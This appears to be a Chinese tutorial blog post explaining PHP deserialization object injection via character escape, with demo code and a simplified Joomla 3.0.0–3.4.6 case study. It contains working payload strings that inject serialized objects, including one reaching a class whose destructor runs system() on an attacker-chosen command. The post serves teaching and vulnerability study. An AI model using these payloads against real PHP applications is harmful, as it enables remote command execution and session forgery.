PHP字符逃逸导致的对象注入详解

本文阅读 5 分钟
首页 PHP笔记 正文

1.漏洞产生原因:
序列化的字符串在经过过滤函数不正确的处理而导致对象注入,目前看到都是因为过滤函数放在了serialize函数之后,要是放在序列化之前应该就不会产生这个问题

  1. function filter($string){
  2. $a = str_replace('x','zz',$string);
  3. return $a;
  4. }
  5. $username = "tr1ple";
  6. $password = "aaaaax";
  7. $user = array($username, $password);
  8. echo(serialize($user));
  9. echo "\n";
  10. $r = filter(serialize($user));
  11. echo($r);
  12. echo "\n";
  13. var_dump(unserialize($r));
  14. $a='a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";';
  15. var_dump(unserialize($a));

php特性:
1.PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的
2.对类中不存在的属性也会进行反序列化
以上代码就明显存在一个问题,即从序列化后的字符串中明显可以看到经过filter函数以后s:6对应的字符串明显变长了
并且如果对于

  1. a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";

这种字符串而言,也能够正常反序列化,说明php在反序列化的时候只要求一个反序列化字符串块合法即可,当然得是第一个字符串块。
以上代码为例,如果能够利用filter函数这种由一个字符变为两个字符的特性来注入想要反序列化后得到的属性,使其可以逃逸出更多可用的字符串,那么我们就能反序列化得到我们想要的属性
比如此时我们想要让反序列化后第二个字符串为123456,此时我们的payload如果和之前的username长度为a,则filter处理以后可能username就会变成a,此时我们的payload变成了新的注入的属性,此时反序列化后就会得到我们想要的结果。
比如a:2:{i:0;s:6:"tr1ple";i:1;s:6:"123456";}是我们想要达到的效果,此时我们想要注入的payload明显为:";i:1;s:6:"123456";}
可以得到其长度为20
此时我们已经知道过滤的规则为x->yy,即注入一个x可以逃逸出一个字符的空位,那么我们只需要注入20个x即可变成40个y,即可逃逸出20个空位,从而将我们的payload变为反序列化后得到的属性值

  1. $username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中红色就是我们想要注入的属性值
  2. $password="aaaaa";
  3. $user = array($username, $password);
  4. echo(serialize($user));
  5. echo "\n";
  6. $r = filter(serialize($user));
  7. echo($r);
  8. echo "\n";
  9. var_dump(unserialize($r));

可以看到此时注入属性成功,反序列化后得到的属性即为123456
2.实例分析
joomla3.0.0-3.4.6 对象注入导致的反序列化,以下为参考别人的简易化核心漏洞代码

  1. class evil{
  2. public $cmd;
  3. public function __construct($cmd){
  4. $this->cmd = $cmd;
  5. }
  6. public function __destruct(){
  7. system($this->cmd);
  8. }
  9. }
  10. class User
  11. {
  12. public $username;
  13. public $password;
  14. public function __construct($username, $password){
  15. $this->username = $username;
  16. $this->password = $password;
  17. }
  18. }
  19. function write($data){
  20. $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
  21. file_put_contents("dbs.txt", $data);
  22. }
  23. function read(){
  24. $data = file_get_contents("dbs.txt");
  25. $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
  26. return $r;
  27. }
  28. if(file_exists("dbs.txt")){
  29. unlink("dbs.txt");
  30. }
  31. $username = "tr1ple";
  32. $password = "A";
  33. $payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"woami";}'; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

在这里如果想要通过注入对象来实现反序列化则必须在外部对象内进行注入存在的属性,不能在其外部,否则php将不会进行我们注入恶意对象的反序列化
例如此时因为反序列化读取的时候将会将六位字符\0\0\0替换成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的,那么s对应的字符串变少以后将会吞掉其他属性的字符,那么如果我们精心算好吞掉的字符长度,并且能够控制被吞掉属性的内容,那么就能够注入对象,从而反序列化其他类

执行结果如上图所示,将成功反序列化password属性所对应的值,其值即为我们注入的对象,整个过程也容易理解,就是吞掉后面的属性来注入属性,那么达到攻击有以下要求:
1.相邻两个属性的值是我们可以控制的
2.前一个属性的s长度可以发生变化,变长变短都可以,变短的话可以吞掉后面相邻属性的值,然后在相邻属性中注入新的对象,如果边长则可以直接在该属性中注入对象来达到反序列化
比如XNUCA2018 hardphp就考察了一个这个相关的trick
这里就出现了用前面的data在反序列化时向后吞一位字符,从而可以导致吞掉后面的普通用户的username字段,而在username字段可以放上我们想要伪造的username,从而达到伪造session的目的。

解压密码: detechn或detechn.com

免责声明

本站所有资源出自互联网收集整理,本站不参与制作,如果侵犯了您的合法权益,请联系本站我们会及时删除。

本站发布资源来源于互联网,可能存在水印或者引流等信息,请用户自行鉴别,做一个有主见和判断力的用户。

本站资源仅供研究、学习交流之用,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担。

PHP根据身份证号码,获取性别、获取生日、计算年龄等多个信息
« 上一篇 01-13
PHP7.4 新特性和废弃的功能(总结)
下一篇 » 01-13

发表评论

1 条回复